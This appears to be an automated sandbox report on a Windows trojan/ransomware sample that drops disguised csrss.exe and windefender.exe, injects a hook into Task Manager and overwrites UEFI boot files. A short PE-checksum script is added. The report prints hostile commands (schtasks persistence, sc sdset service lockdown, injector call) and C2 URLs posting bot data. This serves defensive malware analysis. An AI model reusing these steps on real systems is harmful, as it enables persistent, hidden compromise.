Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019C58EC 36_2_00007FF7019C58EC
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019C8040 36_2_00007FF7019C8040
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019C4830 36_2_00007FF7019C4830
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019D2864 36_2_00007FF7019D2864
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019CF070 36_2_00007FF7019CF070
PE file does not import any functions
Source: EfiGuardDxe.efi.11.dr Static PE information: No import functions for PE file found
Source: bootmgfw.efi.11.dr Static PE information: No import functions for PE file found
Source: bootx64.efi.11.dr Static PE information: No import functions for PE file found
Enables security privileges
Source: C:\Windows\SysWOW64\sc.exe Process token adjusted: Security
Source: 0NlSa5bf55.exe Virustotal: Detection: 66%
Source: 0NlSa5bf55.exe ReversingLabs: Detection: 64%
Source: C:\Users\user\Desktop\0NlSa5bf55.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\0NlSa5bf55.exe "C:\Users\user\Desktop\0NlSa5bf55.exe"
Source: C:\Users\user\Desktop\0NlSa5bf55.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\0NlSa5bf55.exe Process created: C:\Users\user\Desktop\upd.exe C:\Users\user\Desktop\upd.exe -update
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
Source: C:\Users\user\Desktop\upd.exe Process created: C:\Users\user\Desktop\upd.exe "C:\Users\user\Desktop\upd.exe" -update
Source: C:\Users\user\Desktop\upd.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn ScheduledUpdate /f
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
Source: C:\Windows\SysWOW64\shutdown.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\windefender.exe C:\Windows\windefender.exe
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\windefender.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\windefender.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
Source: unknown Process created: C:\Windows\windefender.exe C:\Windows\windefender.exe
Source: C:\Users\user\Desktop\upd.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32
Source: C:\Users\user\Desktop\upd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\rss\csrss.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\windefender.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\0NlSa5bf55.exe File created: C:\Users\user\Desktop\upd.exe
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss
Source: classification engine Classification label: mal100.rans.troj.evad.winEXE@41/15@21/5
Source: csrss.exe, 0000000B.00000002.568351371.00000000119DE000.00000004.00000001.sdmp Binary or memory string: SELECT BuildNumber FROM Win32_OperatingSystemh3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f65db027-aff3-4070-886a-0d87064aabb1}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f65db027-aff3-4070-886a-0d87064aabb1}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}https://server2.trumops.com/bots/post-ia-data?uuid=442b90d2-fde4-485f-a003-6086e2191d6e
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019B27F0 CreateMutexW,SleepEx,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,lstrcmpiW,Process32NextW,FindCloseChangeNotification,GetLastError,SetLastError,OpenProcess,GetLastError,VirtualAllocEx,WriteProcessMemory,LoadLibraryW,CreateRemoteThread,CloseHandle,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle, 36_2_00007FF7019B27F0
Source: 0NlSa5bf55 Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6016:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1460:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6280:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5360:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_01
Source: C:\Windows\rss\csrss.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\h48yorbq6rm87zot
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\qtxp9g8w
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5168:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4640:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2700:120:WilError_01
Source: upd.exe String found in binary or memory: application/app/install.go
Source: upd.exe String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
Source: upd.exe String found in binary or memory: application/resilience/btcblockchain/address.go
Source: upd.exe String found in binary or memory: largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2 /bots/scheduled-install23283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakh
Source: csrss.exe String found in binary or memory: application/app/install.go
Source: csrss.exe String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
Source: csrss.exe String found in binary or memory: application/resilience/btcblockchain/address.go
Source: csrss.exe String found in binary or memory: largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2 /bots/scheduled-install23283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakh
Source: 0NlSa5bf55.exe String found in binary or memory: Mask/AddresOEnv
Source: C:\Users\user\Desktop\0NlSa5bf55.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\rss\csrss.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 0NlSa5bf55.exe Static file information: File size 2095616 > 1048576
Source: 0NlSa5bf55.exe Static PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x1ff600
Source: Binary string: Loader.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp, bootx64.efi.11.dr
Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: symsrv.pdb source: upd.exe, 00000005.00000002.321400821.0000000000C57000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.350292388.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.565483250.0000000000C57000.00000040.00020000.sdmp
Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: '(.EfiGuardDxe.pdb source: upd.exe.0.dr
Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: Unable to locate the .pdb file in this location source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: The module signature does not match with .pdb signature. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: .pdb.dbg source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: '(EfiGuardDxe.pdbx source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp, EfiGuardDxe.efi.11.dr
Source: Binary string: symsrv.pdbGCTL source: upd.exe, 00000005.00000002.321400821.0000000000C57000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.350292388.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.565483250.0000000000C57000.00000040.00020000.sdmp
Source: Binary string: or you do not have access permission to the .pdb location. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: EfiGuardDxe.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp, EfiGuardDxe.efi.11.dr
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: dbghelp.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: dbghelp.pdbGCTL source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\rss\csrss.exe Code function: 11_3_119322AA pushad ; ret 11_3_119322C9
PE file contains sections with non-standard names
Source: 0NlSa5bf55.exe Static PE information: section name: UPX2
Source: upd.exe.0.dr Static PE information: section name: UPX2
Source: csrss.exe.8.dr Static PE information: section name: UPX2
Source: injector.exe.11.dr Static PE information: section name: _RDATA
Source: windefender.exe.11.dr Static PE information: section name: UPX2
Source: bootmgfw.efi.11.dr Static PE information: section name: .xdata
Source: bootx64.efi.11.dr Static PE information: section name: .xdata
Source: EfiGuardDxe.efi.11.dr Static PE information: section name: .xdata
Source: NtQuerySystemInformationHook.dll.11.dr Static PE information: section name: _RDATA
PE file contains an invalid checksum
Source: EfiGuardDxe.efi.11.dr Static PE information: real checksum: 0x4a5a6 should be: 0x51a75
Source: csrss.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x3a37d7
Source: bootmgfw.efi.11.dr Static PE information: real checksum: 0x2199 should be: 0x4c78
Source: bootx64.efi.11.dr Static PE information: real checksum: 0x2199 should be: 0x4c78
Source: injector.exe.11.dr Static PE information: real checksum: 0x0 should be: 0x54ea2
Source: windefender.exe.11.dr Static PE information: real checksum: 0x0 should be: 0x20ae45
Source: 0NlSa5bf55.exe Static PE information: real checksum: 0x0 should be: 0x20add5
Source: upd.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x3a37d7
Source: NtQuerySystemInformationHook.dll.11.dr Static PE information: real checksum: 0x0 should be: 0x2279d
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
(the UPX0/UPX1 pair is reported four times, once per UPX-packed PE, consistent with the four files that carry a UPX2 section above)
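The "real checksum ... should be ..." findings above compare the CheckSum stored in the optional header with the value the PE checksum algorithm yields for the file contents. A stored value of 0x0 means the field was never filled in, which is typical of UPX output and of hand-patched binaries; Windows does not validate the field for ordinary user-mode executables, so a zero or mismatched checksum is a packing/tampering hint, not a detection on its own. The Python below is an added example, not part of the Joe Sandbox report, that reproduces the comparison; the stub image it builds is constructed for the demo and is not one of the report's files.

```python
import struct


def pe_checksum(image: bytes, checksum_offset: int) -> int:
    """Compute OptionalHeader.CheckSum over a whole PE file image.

    Same arithmetic as imagehlp's CheckSumMappedFile: add every 32-bit word of the
    file (skipping the dword that holds the CheckSum field), fold carries down to
    16 bits, then add the file length in bytes.
    """
    length = len(image)
    padded = image + b"\0" * (-length % 4)          # pad to a dword boundary
    skip = checksum_offset & ~3                     # dword containing the field
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + length


def checksum_field_offset(image: bytes) -> int:
    """File offset of OptionalHeader.CheckSum: e_lfanew + 4 (signature) + 20 (COFF) + 64."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe_off = struct.unpack_from("<I", image, 0x3C)[0]
    if image[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    return pe_off + 4 + 20 + 64


def verify_checksum(image: bytes) -> dict:
    """Compare the stored CheckSum with the one computed from the file contents."""
    off = checksum_field_offset(image)
    stored = struct.unpack_from("<I", image, off)[0]
    computed = pe_checksum(image, off)
    return {"stored": stored, "computed": computed,
            "unset": stored == 0, "matches": stored == computed}


def build_stub_image(checksum: int = 0) -> bytes:
    """Constructed minimal PE32 header layout used only to exercise the functions.

    Not a loadable executable: just MZ, e_lfanew, the PE signature, a COFF header
    with Machine=i386 and an optional header with Magic=PE32 and the given CheckSum.
    """
    img = bytearray(0x40 + 4 + 20 + 96)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)              # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", img, 0x44, 0x014C)            # COFF Machine = IMAGE_FILE_MACHINE_I386
    struct.pack_into("<H", img, 0x58, 0x010B)            # OptionalHeader Magic = PE32
    struct.pack_into("<I", img, 0x58 + 64, checksum)     # OptionalHeader.CheckSum
    return bytes(img)


if __name__ == "__main__":
    import sys
    # Pass a PE file path as the first argument; without one the stub image is used.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_stub_image()
    r = verify_checksum(data)
    print(f"real checksum: {r['stored']:#x} should be: {r['computed']:#x}"
          + ("" if r["matches"] else "  (MISMATCH)"))
```

Run against csrss.exe or upd.exe from this report the output line should match the "real checksum: 0x0 should be: 0x3a37d7" entries above. The firmware images in the same list (bootmgfw.efi, EfiGuardDxe.efi) are ordinary PE32+ files, so the same check applies to them; a mismatch there is more interesting, because EFI binaries are normally produced by a linker that fills the field in.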

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\upd.exe Executable created and started: C:\Windows\rss\csrss.exe
Source: unknown Executable created and started: C:\Windows\windefender.exe
Drops PE files with benign system names
Source: C:\Users\user\Desktop\upd.exe File created: C:\Windows\rss\csrss.exe
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Microsoft\Boot\bootmgfw.efi
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\bootx64.efi
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\EfiGuardDxe.efi
(UEFI applications and drivers are PE32+ images, so PE content under a .efi extension is expected rather than anomalous; the relevant point is which files are written: the Windows boot manager path bootmgfw.efi, the removable-media fallback loader path bootx64.efi, and an EfiGuardDxe.efi driver)
Drops PE files
Source: C:\Users\user\Desktop\0NlSa5bf55.exe File created: C:\Users\user\Desktop\upd.exe
Source: C:\Windows\rss\csrss.exe File created: B:\EFI\Boot\old.efi (copy)
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
Source: C:\Users\user\Desktop\upd.exe File created: C:\Windows\rss\csrss.exe
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\EfiGuardDxe.efi
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\bootx64.efi
Source: C:\Windows\rss\csrss.exe File created: C:\Windows\windefender.exe
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Microsoft\Boot\bootmgfw.efi
Source: C:\Windows\rss\csrss.exe File created: B:\EFI\Microsoft\Boot\fw.efi (copy)
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\upd.exe File created: C:\Windows\rss\csrss.exe
Source: C:\Windows\rss\csrss.exe File created: C:\Windows\windefender.exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
